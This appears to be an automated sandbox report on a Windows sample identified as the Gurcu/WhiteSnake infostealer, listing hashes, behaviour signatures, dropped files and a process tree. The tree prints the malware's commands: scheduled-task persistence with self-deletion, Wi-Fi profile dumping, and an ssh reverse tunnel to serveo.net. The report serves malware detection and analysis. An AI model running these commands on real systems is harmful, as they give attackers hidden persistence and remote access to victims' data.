Analysis

  • max time kernel
    162s
  • max time network
    178s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    28-09-2023 06:39

General

  • Target

    tmp.exe

  • Size

    426KB

  • MD5

    ef43d260ba94eea5dad184fcb6e1abcf

  • SHA1

    2cad3eaa11d5842b430ca28c9d185bc82d7661d1

  • SHA256

    8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

  • SHA512

    de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

  • SSDEEP

    6144:3Gd/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccHa+u9bamBftR0RgW:cRatpvnzZjDv7oj19yTaAmBftR0CW

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 5 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2948
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1744
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:1700
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2568
        • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2476
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:3052
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:2872
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:1504
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1360
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:1160
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:1920
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:1168
                      • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                        "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3196 serveo.net
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1744
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {1DF5A2CC-5938-48AC-B995-81A143EDDCF4} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2204
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                    C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                    2⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    • outlook_office_path
                    • outlook_win_path
                    PID:2404
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2724
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        4⤵
                          PID:756
                        • C:\Windows\system32\findstr.exe
                          findstr /R /C:"[ ]:[ ]"
                          4⤵
                            PID:2760
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            4⤵
                              PID:1392
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:432
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              4⤵
                                PID:1528
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show networks mode=bssid
                                4⤵
                                  PID:928
                                • C:\Windows\system32\findstr.exe
                                  findstr "SSID BSSID Signal"
                                  4⤵
                                    PID:608

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe

                              Filesize

                              426KB

                              MD5

                              ef43d260ba94eea5dad184fcb6e1abcf

                              SHA1

                              2cad3eaa11d5842b430ca28c9d185bc82d7661d1

                              SHA256

                              8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

                              SHA512

                              de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe

                              Filesize

                              426KB

                              MD5

                              ef43d260ba94eea5dad184fcb6e1abcf

                              SHA1

                              2cad3eaa11d5842b430ca28c9d185bc82d7661d1

                              SHA256

                              8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

                              SHA512

                              de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe

                              Filesize

                              426KB

                              MD5

                              ef43d260ba94eea5dad184fcb6e1abcf

                              SHA1

                              2cad3eaa11d5842b430ca28c9d185bc82d7661d1

                              SHA256

                              8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

                              SHA512

                              de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

                            • C:\Users\Admin\AppData\Local\j615vue6hx\port.dat

                              Filesize

                              4B

                              MD5

                              6c4bb406b3e7cd5447f7a76fd7008806

                              SHA1

                              57830a73f0453a9e33ebf496fe4a870537188df7

                              SHA256

                              6b4dd2d449aa8727c4af08d17825f7d19ce1bd56f0ef42da4e014c058f872bdd

                              SHA512

                              575564b56d4bb1df0b92bb3a92b1dc49d70c58913430b8c5a1760a5bdb1ad008d153bc55a78072891e21f2f2f36af771d34320cd8fa5544bff8df00dad7d10c1

                            • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • memory/1352-7-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1352-4-0x000000001B2B0000-0x000000001B330000-memory.dmp

                              Filesize

                              512KB

                            • memory/1352-3-0x000000001B2B0000-0x000000001B330000-memory.dmp

                              Filesize

                              512KB

                            • memory/1352-0-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1352-2-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1352-1-0x0000000000CB0000-0x0000000000D1C000-memory.dmp

                              Filesize

                              432KB

                            • memory/2404-135-0x000000001B310000-0x000000001B390000-memory.dmp

                              Filesize

                              512KB

                            • memory/2404-17-0x000000001B310000-0x000000001B390000-memory.dmp

                              Filesize

                              512KB

                            • memory/2404-16-0x000007FEF4E00000-0x000007FEF57EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2404-134-0x000007FEF4E00000-0x000007FEF57EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2604-13-0x000000001B270000-0x000000001B2F0000-memory.dmp

                              Filesize

                              512KB

                            • memory/2604-20-0x000007FEF4E00000-0x000007FEF57EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2604-132-0x000000001B270000-0x000000001B2F0000-memory.dmp

                              Filesize

                              512KB

                            • memory/2604-12-0x000007FEF4E00000-0x000007FEF57EC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2604-11-0x00000000003F0000-0x000000000045C000-memory.dmp

                              Filesize

                              432KB